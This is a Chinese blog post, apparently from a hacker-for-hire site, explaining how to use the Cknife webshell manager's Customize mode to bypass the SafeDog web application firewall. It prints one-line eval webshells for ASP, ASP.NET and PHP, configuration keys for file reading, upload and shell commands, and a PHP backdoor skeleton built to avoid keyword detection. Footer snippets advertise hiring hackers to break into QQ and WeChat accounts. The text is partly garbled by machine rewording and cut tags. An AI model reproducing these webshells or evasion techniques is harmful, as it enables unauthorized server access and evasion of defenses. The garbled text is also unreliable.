打狗棒法之:Cknife(C刀)自定义形式秒过安全狗

访客5年前关于黑客接单687

许多朋友在运用Cknife时都误以为她仅仅菜刀的跨渠道升级版,仅仅多了跨渠道的功用,其实小伙伴们还没有用到精华之处,她其实也是一款过WAF的利器。没有给咱们解说怎么去运用它这是我的职责,我是一个有职责心的基佬,我会对咱们担任的,所以有了下面的文章:
0×01 两种办法
Cknife有两种过WAF形式,一种为修正配置文件(Config.ini)过WAF,别的一种为Customize(自界说)形式过WAF。今日以自界说形式为例实例解说秒过安全狗,当然文章发布往后各大WAF厂商必定会将某些特征列入黑名单,这儿仅仅抛砖引玉供给思路。
0×02 ReadMe.txt
许多朋友在运用软件的时分都很少会重视她,这儿我附上它的有关于过WAF方面的一些内容,请咱们仔细阅读赤色部分。
[此处省掉1W字]
运用说明:
服务端脚本支撑ASP、ASPX、PHP、 *** P、Customize(自界说)。
代码包括且不限于如下代码(只需能构造出相似eval的函数就行,比方PHP的create_function、assert等)
ASP:      
eval request("Cknife")%>
ASP.NET:  
"Jscript"%>"Cknife"],"unsafe");%>
PHP:      
 @eval($_POST['Cknife']);?>
*** P:     
[代码详见1.jsp]
Customize: 
自界说类型,功用代码在服务端保存,理论上支撑一切动态脚本,只需正确与C刀进行交互即可。此形式可按需定制,比方只需阅读目录,或是只需虚拟终端功用,代码能够很简略。
过WAF:
这是一款跨渠道的根据配置文件的我国菜刀,把一切操作给予用户来界说,主程序仅仅图形的展现,以及数据的发送。
我分开了每一个过程写入到配置文件里边,用户能够自界说任何代码,包括更改参数称号,参数内容。
比方:
 SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel设置皮肤为nimbus
SPL=->|                                               表明截取数据的开始符号
SPR=|
除了修正以上参数过WAF外,程序还额定供给了一种Customize过WAF的形式。
Customize形式原本是用于支撑一些程序默许不支撑的脚本,比方CFM、A *** X、ASHX、PY等等,只需用户自写的脚天性正确与菜刀进行交互即可。
换一个考虑 *** ,假如咱们自写一个PHP脚本完成了列文件以及目录的功用,它能够正确的与C刀进行交互,这个时分假如咱们挑选PHP(Eval)的衔接 *** 就会衔接失利。
应该挑选Customize形式进行衔接。有人说为什么一句话就能够衔接,你偏偏还要写这么多代码用Customize形式衔接?假如一个很厉害的WAF检测eval,assert等关键词
,你的一句话实在是饶不过,这个时分你能够不必一句话,就在PHP脚本里用正常代码完成列文件以及目录,然后用Customize形式衔接就达到了过WAF的意图。
Customize(自界说)形式跟其他形式相同,每一个过程也都写入到配置文件里边,用户相同能够参数称号以及参数内容。
比方你自写了用Customize形式衔接的Customize.php服务端。
显现主页功用提交的参数应该是:暗码=1&action=index以及暗码=1&action=readdict。
假如C刀遍及今后WAF厂商必定会把readdict列入黑名单,这个时分你就能够修正readdict的称号为其他称号,相同能够修正action的称号,也能够修正1为其他字符
CUS_MAKE=1
CUS_INDEX=index
CUS_READDICT=readdict
CUS_READFILE=readfile
CUS_SAVEFILE=savefile
CUS_DELETE=delete
CUS_RENAME=rename
CUS_NEWDICT=newdict
CUS_UPLOAD=upload
CUS_DOWNLOAD=download
CUS_SHELL=shell
[此处省掉1W字]
0×03 自界说形式过WAF原理
假如仅仅运用一句话,许多厂商都查杀了eval等灵敏关键词,也查杀了传递过程中数据包中的灵敏关键词。咱们只需要正常的完成列目录、读文件等功用而且没有包括eval等灵敏关键词就能够绕过WAF,即服务端不运用一句话,而是把功用代码都放在服务端来履行,客户端提交正常的数据包。
0×04 过狗预备
有的朋友说还要自己写列目录、读文件等等这些功用啊,那必定没戏了。其实不需要自己写,只需要复制粘贴修正即可。
你要有点编程根底(不必忧虑只需会if句子就行),然后依照我给的结构增加就行。以PHP为例:
结构如下:
$pwd= 'Cknife';        //暗码
if($_POST [$pwd] == 1) {
         $act = $_POST ['action'];         // action称号
         echo ("->|");    // 前分隔符
         if ($act == 'index') {           // 显现主页功用
                  
         } else if ($act == 'readdict') {   // 读取目录功用
                  
         } else if ($act == …)          // 你想要完成的功用,能够从Config.ini里边解密出来运用
{
}
         echo ("|/ 后分隔符
}
?>
首要翻开咋们心爱的Config.ini文件,找到PHP_INDEX

[1] [2]  黑客接单网

相关文章

靠谱点的黑客到哪里找,黑客联系方式

说到黑客,咱们的第一反应是厚厚的黑框眼镜、油腻的格子衬衫和很久没梳过的脏头发。 但是他们有一双灵活的手。 当他们上下飞来飞去时,他们不断地从事“网络犯罪”,进入他人的电脑,如同没有人在那...

黑客盗QQ号接单,哪里能联系上黑客,找黑客同步老婆微信

@OverrideDomain3.6 NTscan字典 saminside榜首级,评分0.0-3.9分,归于低危缝隙,这类缝隙无法绕过认证程序,简略来说进犯者无法运用这类缝隙拜访受限制的信息,也无法对...

如何定位微信好友位置,厦门黑客联系电话,道德黑客工作哪里找

图15 GFSK解调脚本作业图历来CTF是很简略出乱子的,有时分乱子来自于本身,比方某年的XDCTF由于校园机房停电导致初赛停顿了几个小时。 当然,更多的乱子来自于“黑客”。 由于CTF是安全相关的竞...

有钱就能随心所欲?揭秘竞价排名背面的黑色产业链

万事不明白都有搜索引擎。在现代生活中搜索引擎成为了比百科全书更为全面的存在。但咱们不了解的是,每一条搜索成果背面,或许都是黑产演出的“实在扮演”。 搜索引擎再遭炮轰? 最近,六六在微博揭露炮轰国内搜索...

我在南京赌博游戏厅输了十几万,通过媒体跟踪报道

首先,通过遍历验证中继帐户所在用户组及权限,发现当前账户可以创建用户、可以修改test.local域的ACL,因为域中的Exchange Windows Permissions用户组被允许修改ACL,...

危机处理方案,找黑客查微信聊天删除记录,怎样在58同城找黑客

$at_id=(int)base64_decode($_REQUEST['id']);仿制代码是相同的作用。 2019 年 12 月 23 日,乌克兰电力网络遭到黑客进犯,导致伊万诺-弗兰科夫斯克州数...